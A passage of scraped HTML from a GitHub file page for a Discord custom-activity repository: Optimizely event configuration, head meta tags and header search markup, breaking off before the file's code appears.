&quot;18234832286&quot;, &quot;key&quot;: &quot;submit.organization_activation.complete&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18252392383&quot;, &quot;key&quot;: &quot;submit.org_repository.create&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18257551537&quot;, &quot;key&quot;: &quot;submit.org_member_invitation.create&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18259522260&quot;, &quot;key&quot;: &quot;submit.organization_profile.update&quot;}, {&quot;experimentIds&quot;: [], 
&quot;id&quot;: &quot;18564603625&quot;, &quot;key&quot;: &quot;view.classroom_select_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18568612016&quot;, &quot;key&quot;: &quot;click.classroom_sign_in_click&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18572592540&quot;, &quot;key&quot;: &quot;view.classroom_name&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18574203855&quot;, &quot;key&quot;: &quot;click.classroom_create_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18582053415&quot;, &quot;key&quot;: &quot;click.classroom_select_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18589463420&quot;, &quot;key&quot;: &quot;click.classroom_create_classroom&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18591323364&quot;, &quot;key&quot;: &quot;click.classroom_create_first_classroom&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18591652321&quot;, &quot;key&quot;: &quot;click.classroom_grant_access&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18607131425&quot;, &quot;key&quot;: &quot;view.classroom_creation&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;, &quot;20619150105&quot;], &quot;id&quot;: &quot;18831680583&quot;, &quot;key&quot;: &quot;upgrade_account_plan&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19064064515&quot;, &quot;key&quot;: &quot;click.signup&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19075373687&quot;, &quot;key&quot;: &quot;click.view_account_billing_page&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19077355841&quot;, &quot;key&quot;: &quot;click.dismiss_signup_prompt&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19079713938&quot;, &quot;key&quot;: &quot;click.contact_sales&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19120963070&quot;, &quot;key&quot;: &quot;click.compare_account_plans&quot;}, 
{&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19151690317&quot;, &quot;key&quot;: &quot;click.upgrade_account_cta&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19424193129&quot;, &quot;key&quot;: &quot;click.open_account_switcher&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19520330825&quot;, &quot;key&quot;: &quot;click.visit_account_profile&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19540970635&quot;, &quot;key&quot;: &quot;click.switch_account_context&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19730198868&quot;, &quot;key&quot;: &quot;submit.homepage_signup&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19820830627&quot;, &quot;key&quot;: &quot;click.homepage_signup&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19988571001&quot;, &quot;key&quot;: &quot;click.create_enterprise_trial&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20036538294&quot;, &quot;key&quot;: &quot;click.create_organization_team&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20040653299&quot;, &quot;key&quot;: &quot;click.input_enterprise_trial_form&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20062030003&quot;, &quot;key&quot;: &quot;click.continue_with_team&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20068947153&quot;, &quot;key&quot;: &quot;click.create_organization_free&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20086636658&quot;, &quot;key&quot;: &quot;click.signup_continue.username&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20091648988&quot;, &quot;key&quot;: &quot;click.signup_continue.create_account&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20103637615&quot;, &quot;key&quot;: &quot;click.signup_continue.email&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20111574253&quot;, &quot;key&quot;: &quot;click.signup_continue.password&quot;}, 
{&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20120044111&quot;, &quot;key&quot;: &quot;view.pricing_page&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20152062109&quot;, &quot;key&quot;: &quot;submit.create_account&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20165800992&quot;, &quot;key&quot;: &quot;submit.upgrade_payment_form&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20171520319&quot;, &quot;key&quot;: &quot;submit.create_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20222645674&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.discuss_your_needs&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20227443657&quot;, &quot;key&quot;: &quot;submit.verify_primary_user_email&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20234607160&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.try_enterprise&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20238175784&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.team&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20239847212&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.continue_free&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20251097193&quot;, &quot;key&quot;: &quot;recommended_plan&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20438619534&quot;, &quot;key&quot;: &quot;click.pricing_calculator.1_member&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20456699683&quot;, &quot;key&quot;: &quot;click.pricing_calculator.15_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20467868331&quot;, &quot;key&quot;: &quot;click.pricing_calculator.10_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20476267432&quot;, &quot;key&quot;: &quot;click.trial_days_remaining&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: 
&quot;20476357660&quot;, &quot;key&quot;: &quot;click.discover_feature&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20479287901&quot;, &quot;key&quot;: &quot;click.pricing_calculator.custom_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20481107083&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.apply_teacher_benefits&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20483089392&quot;, &quot;key&quot;: &quot;click.pricing_calculator.5_members&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20484283944&quot;, &quot;key&quot;: &quot;click.onboarding_task&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20484996281&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.apply_student_benefits&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20486713726&quot;, &quot;key&quot;: &quot;click.onboarding_task_breadcrumb&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20490791319&quot;, &quot;key&quot;: &quot;click.upgrade_to_enterprise&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20491786766&quot;, &quot;key&quot;: &quot;click.talk_to_us&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20494144087&quot;, &quot;key&quot;: &quot;click.dismiss_enterprise_trial&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20499722759&quot;, &quot;key&quot;: &quot;completed_all_tasks&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20500710104&quot;, &quot;key&quot;: &quot;completed_onboarding_tasks&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20513160672&quot;, &quot;key&quot;: &quot;click.read_doc&quot;}, {&quot;experimentIds&quot;: [&quot;20512531891&quot;], &quot;id&quot;: &quot;20516196762&quot;, 
&quot;key&quot;: &quot;actions_enabled&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20518980986&quot;, &quot;key&quot;: &quot;click.dismiss_trial_banner&quot;}, {&quot;experimentIds&quot;: [&quot;20518037255&quot;], &quot;id&quot;: &quot;20535446721&quot;, &quot;key&quot;: &quot;click.issue_actions_prompt.dismiss_prompt&quot;}, {&quot;experimentIds&quot;: [&quot;20518037255&quot;], &quot;id&quot;: &quot;20557002247&quot;, &quot;key&quot;: &quot;click.issue_actions_prompt.setup_workflow&quot;}, {&quot;experimentIds&quot;: [&quot;20512531891&quot;], &quot;id&quot;: &quot;20595070227&quot;, &quot;key&quot;: &quot;click.pull_request_setup_workflow&quot;}, {&quot;experimentIds&quot;: [&quot;20619150105&quot;], &quot;id&quot;: &quot;20626600314&quot;, &quot;key&quot;: &quot;click.seats_input&quot;}, {&quot;experimentIds&quot;: [&quot;20619150105&quot;], &quot;id&quot;: &quot;20642310305&quot;, &quot;key&quot;: &quot;click.decrease_seats_number&quot;}, {&quot;experimentIds&quot;: [&quot;20619150105&quot;], &quot;id&quot;: &quot;20662990045&quot;, &quot;key&quot;: &quot;click.increase_seats_number&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20679620969&quot;, &quot;key&quot;: &quot;click.public_product_roadmap&quot;}], &quot;revision&quot;: &quot;903&quot;}" /> <!-- To prevent page flashing, the optimizely JS needs to be loaded in the <head> tag before the DOM renders --> <script crossorigin="anonymous" defer="defer" integrity="sha512-0h1v+cT+vo2H4r2RIaHBoqggV4iI4Ah+a66PI4mUxhOkt3B7B/OeCMj80fIAb23CGQDCEYsVduIJfHChKLMFhw==" type="application/javascript" src="https://github.githubassets.com/assets/optimizely-d21d6ff9.js"></script> <meta name="hostname" content="github.com"> <meta name="user-login" content="Bomzz06"> <meta name="expected-hostname" content="github.com"> <meta name="js-proxy-site-detection-payload" 
content="YmM1ZWQ3YTU2YWQxZWUyNTM3YzRhMzM4M2MyODg5MzI0OWZiYmQxNmRhZTFhYmM5MTU1YzEwZGQ0YzZjNTRlMnx7InJlbW90ZV9hZGRyZXNzIjoiMTQwLjIxMy43LjE4NCIsInJlcXVlc3RfaWQiOiJBNDlGOjc4NTk6RDM5Njg6MTRGQUNEOjYxNUFFMjg1IiwidGltZXN0YW1wIjoxNjMzMzQ2MTgxLCJob3N0IjoiZ2l0aHViLmNvbSJ9"> <meta name="keyboard-shortcuts-preference" content="all"> <meta name="enabled-features" content="BRANCH_PROTECTION_RULE_WEBHOOK,MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION"> <meta http-equiv="x-pjax-version" content="c968ea42bc668fd66601e1b1178d236136ff381f20e8b8409d15e3dcd3c1c765"> <meta http-equiv="x-pjax-csp-version" content="8bb37f5b1649ef2bd79e9fefcbdd2cf21c1ba6315dbff4f9055455365d2daa86"> <meta http-equiv="x-pjax-css-version" content="b2fa4163e7018ea220c6ecc3a98eb4b79de0edb28e96ffba31345742dc34a9d7"> <meta http-equiv="x-pjax-js-version" content="b62840f36bdd7b926c395951e9aa0f266160de0281ac06d8cd24486348846c8e"> <meta name="go-import" content="github.com/agambajwa/discord-custom-activity git https://github.com/agambajwa/discord-custom-activity.git"> <meta name="octolytics-dimension-user_id" content="30459122" /><meta name="octolytics-dimension-user_login" content="agambajwa" /><meta name="octolytics-dimension-repository_id" content="298526344" /><meta name="octolytics-dimension-repository_nwo" content="agambajwa/discord-custom-activity" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="298526344" /><meta name="octolytics-dimension-repository_network_root_nwo" content="agambajwa/discord-custom-activity" /> <link rel="canonical" href="https://github.com/agambajwa/discord-custom-activity/blob/master/app.py" data-pjax-transient> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta 
name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"> <meta name="color-scheme" content="light dark" /> <meta name="msapplication-TileImage" content="/windows-tile.png"> <meta name="msapplication-TileColor" content="#ffffff"> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-in env-production page-responsive page-blob" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> <a href="#start-of-content" class="p-3 color-bg-info-inverse color-text-white show-on-focus js-skip-to-content">Skip to content</a> <span data-view-component="true" class="progress-pjax-loader js-pjax-loader-bar Progress position-fixed width-full"> <span style="width: 0%;" data-view-component="true" class="Progress-item progress-pjax-loader-bar color-bg-info-inverse"></span> </span> <header class="Header js-details-container Details px-3 px-md-4 px-lg-5 flex-wrap flex-md-nowrap" role="banner" > <div class="Header-item mt-n1 mb-n1 d-none d-md-flex"> <a class="Header-link " href="https://github.com/" data-hotkey="g d" aria-label="Homepage " data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;go to dashboard&quot;,&quot;label&quot;:&quot;icon:logo&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" 
data-hydro-click-hmac="4caab5790c0a42a2267601624fa799518e43617bad147991e919699a43f0bf22" > <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github v-align-middle"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path> </svg> </a> </div> <div class="Header-item d-md-none"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="Header-link js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path> </svg> </button> </div> <div class="Header-item Header-item--full flex-column flex-md-row width-full flex-order-2 flex-md-order-none mr-0 mr-md-3 mt-3 mt-md-0 Details-content--hidden-not-important d-md-flex"> <div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to" > <div class="position-relative"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="js-site-search-form" role="search" aria-label="Site" 
data-scope-type="Repository" data-scope-id="298526344" data-scoped-search-url="/agambajwa/discord-custom-activity/search" data-owner-scoped-search-url="/users/agambajwa/search" data-unscoped-search-url="/search" action="/agambajwa/discord-custom-activity/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search or jump to…" data-unscoped-placeholder="Search or jump to…" data-scoped-placeholder="Search or jump to…" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search or jump to…" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" value="0TRNZE4AKSd7FDM4Jmb/6vBlsky+mAoILrfFfkkGXsFpeLxUCyLlu1AqgkfeyqWebEqpzzt6jMaWf/NsLwPdbw==" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <ul class="d-none js-jump-to-suggestions-template-container"> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-suggestion" 
role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="suggestion"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img 
class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository"> In this repository </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> </ul> <ul class="d-none js-jump-to-no-results-template-container"> <li class="d-flex flex-justify-center flex-items-center f5 d-none js-jump-to-suggestion p-2"> <span class="color-text-secondary">No suggested jump to results</span> </li> </ul> <ul id="jump-to-results" role="listbox" class="p-0 m-0 js-navigation-container jump-to-suggestions-results-container js-jump-to-suggestions-results-container"> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-scoped-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="scoped_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> 
<path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository"> In this repository 
</span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-owner-scoped-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="owner_scoped_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 
00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user"> In this user </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-global-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="global_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" 
